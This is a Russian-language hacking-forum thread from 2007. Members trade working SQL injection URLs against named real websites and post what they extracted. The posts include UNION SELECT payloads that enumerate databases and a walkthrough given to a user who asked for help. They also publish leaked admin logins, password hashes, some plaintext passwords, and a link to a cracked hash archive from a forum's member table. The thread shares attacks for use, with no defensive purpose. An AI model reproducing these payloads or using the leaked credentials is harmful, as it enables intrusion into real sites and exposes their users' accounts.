12.10.2007, 21:41
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
С нами:
10495046
Репутация:
2642
|
|
Пипец. nasa-academy.org <- 86 столбцов.
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( 0x3C62723E,VERSION(),DATABASE(),USER(),0x3C62723E),30,
31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,
61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,table_name,30,
0x3C62723E,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,
61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86+from+information_schem a.tables+limit+16,1
5.0.26-max-log
academy
academy@localhost
Блин, чё, наса не могут нанять нормальных спецов, чтобы сделали сайт без багов? |
|
|
12.10.2007, 23:08
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
С нами:
10246130
Репутация:
141
|
|
Код:
http://omsk.arsec.ru/modules/articles/article.php?id=1+union+select+1,2,3,4,5,6,concat(uname,0x3a,pass),8,9,1,2,3,4,5,6,7,8,9,1,2+from+u26773.ars_users+limit+1,1/*
admin:48c7b8a13ce1f0fbbec213d87ebcda5e
http://www.vitz.ru/firms.php?cat=services&re=-58+union+select+1,2,3,concat(name,0x3a,password),i cq_number,concat(ip_address,0x3a,email),7,8+from+v itz_forums.ibf_members/*
Сразу вся база имя\хеш\уин\IP\email 5931 записей ) жаль что IPB (
Расшифровал.  (Пользователей:4996, Найдено:3220)
http://rapidshare.com/files/62099632/hashes.rar.html |
|
|
|
13.10.2007, 07:49
|
|
Новичок
Регистрация: 31.03.2007
Сообщений: 22
С нами:
10059835
Репутация:
-1
|
|
http://www.0629.com.ua/view_news.php?id_news=
Только не пойму чего с ней делать!
|
|
|
|
13.10.2007, 09:44
|
|
Новичок
Регистрация: 02.10.2007
Сообщений: 3
С нами:
9794465
Репутация:
2
|
|
помогите pаскрутит
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,4,5/*
|
|
|
|
13.10.2007, 10:11
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
admin@localhost:5.0.27-log:runescape
выводим количество таблиц
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,count(table_name),5+from+information_schema.tables/*
142, =///
выводим таблицы, где есть колонка password
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(table_schema,0x3a,table_name),5+from+information_schema.columns+where+column_name=char(112,97,115,115,119,111,1 14,100)+limit+0,1/*
lotro:adds_users
runescape:adds_users
war:adds_users
выводим, например, колонки из lotro:adds_users
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(column_name),5+from+information_schema.columns+where+table_schema=char(108,111,116,114,111)+and+table_name=char(97,100 ,100,115,95,117,115,101,114,115)+limit+0,1/*
user_id
user_name
password
итд
http://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+lotro.adds_users/*
http://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+war.adds_users/*
http://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+runescape.adds_users/*
итд лимитом |
|
|
|
13.10.2007, 17:08
|
|
Banned
Регистрация: 06.10.2006
Сообщений: 288
С нами:
10313060
Репутация:
469
|
|
www.uselessjunk.com
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23/*
ну тут всё понятно)
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23+from+INFORMATION _SCHEMA.TABLES+LIMIT+16,1/*
админы
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,concat(fld_username,0x3a, fld_password),7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23+from+tbl_admin+limit+0,1/*
Юзеры
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,concat(fld_username,0x3a, fld_password),7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23+from+tbl_users+limit+0,1/*
Админка
www.uselessjunk.com/admin.php
админы:
id:name:pass
1:admin: tigerwoods
2:hoover: stile
3:turtle: turtleuj2007
4:matt: diabl0
Последний раз редактировалось Underwit; 13.10.2007 в 20:08..
|
|
|
|
13.10.2007, 17:48
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
-------------удалено---боян--------------
www.rare.ru
http://www.rare.ru/show.php?index=-13+union+select+1,2,3,concat(version(),0x2F,databa se(),0x2F,user()),5/*
5.0.45-log/rareru/rareru@10.10.10.216
http://www.rare.ru/show.php?index=-13+union+select+1,2,3,table_name,table_schema+from +information_schema.tables/*
Таблицы можно покопаться
http://www.rare.ru/show.php?index=-13+union+select+1,2,3,pass,login+from+users/*
логин\хеш
Последний раз редактировалось Grey; 13.10.2007 в 18:21..
Причина: Одна из инъекций боян.
|
|
|
|
13.10.2007, 21:14
|
|
Участник форума
Регистрация: 30.05.2007
Сообщений: 115
С нами:
9973582
Репутация:
135
|
|
Код:
http://www.yuretz.ru/prikol.php?id=-471+union+select+1,convert(version()+using+cp1251),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
|
|
|
|
13.10.2007, 22:13
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
z-chat.ru
http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(version(),0x2F,database(),0x 2F,user()),2/*
4.0.25/zchatspb/zchatspb@local
http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(login,0x2F,passwd,0x2F,icq), 2+from+user/*
логин\хеш\уин но там какой-то прикол с выводом .... наверно ограничение на длину строки .. хотя хз
да, можно выводить отдельно логин хеш и уин но так не красиво )
Последний раз редактировалось ElteRUS; 13.10.2007 в 22:25..
|
|
|
|
14.10.2007, 14:53
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
reporter.kherson.ua
http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,concat(version(),0x3a,database( ),0x3a,user()),4,5,6,7,8,9/*
5.0.32-Debian_7etch1-log:reporter:lsd@localhost
http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,3,uname,5,6,7,pass,9+from+users +limit+7,1/*
логин \ пароль
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
